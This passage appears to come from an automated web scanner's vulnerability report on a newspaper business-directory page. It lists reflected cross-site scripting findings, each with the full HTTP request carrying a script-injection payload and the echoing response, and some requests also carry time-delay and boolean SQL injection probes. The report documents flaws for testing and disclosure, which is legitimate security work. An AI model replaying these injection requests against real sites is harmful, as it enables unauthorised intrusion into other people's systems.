25-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 82707
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=CJOLPOGABELCKMMDCFDCLJPA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<a href="javascript:openPhoto('http://listings.nytimes.com/Redesign/+ComShare/photoimage.asp?Lid=80-N1011083&CategoryId=BIZDIR17a59"><script>alert(1)</script>e4b9c9d10edc54c92');">
...[SNIP]...

4.188. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6f6"><script>alert(1)</script>d6a14042115a5cc08 was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=ec6f6"><script>alert(1)</script>d6a14042115a5cc08&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91566
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="ChangeEmail" value="ec6f6"><script>alert(1)</script>d6a14042115a5cc08">
...[SNIP]...

4.189. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the HTML document as plain text between tags. The payload 9936b<script>alert(1)</script>288021037f2113630 was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--9936b<script>alert(1)</script>288021037f2113630&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--9936b<script>alert(1)</script>288021037f2113630&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&Region
...[SNIP]...

4.190. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the HTML document as plain text between tags. The payload 5e98e<script>alert(1)</script>8db20327c0b was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com5e98e<script>alert(1)</script>8db20327c0b&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com5e98e<script>alert(1)</script>8db20327c0b&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c
...[SNIP]...

4.191. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ChangeEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ChangeEmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53416"><script>alert(1)</script>60c763b2f67 was submitted in the ChangeEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=53416"><script>alert(1)</script>60c763b2f67&KeyWord=--+Keyword+--&RegionId=&SubCatId= HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91441
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=EIOLPOGAOICHGPEICIBANOJC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="ChangeEmail" value="53416"><script>alert(1)</script>60c763b2f67">
...[SNIP]...

4.192. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [DOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the DOrder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56313"><script>alert(1)</script>b12c9d365d01799f3 was submitted in the DOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A56313"><script>alert(1)</script>b12c9d365d01799f3&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2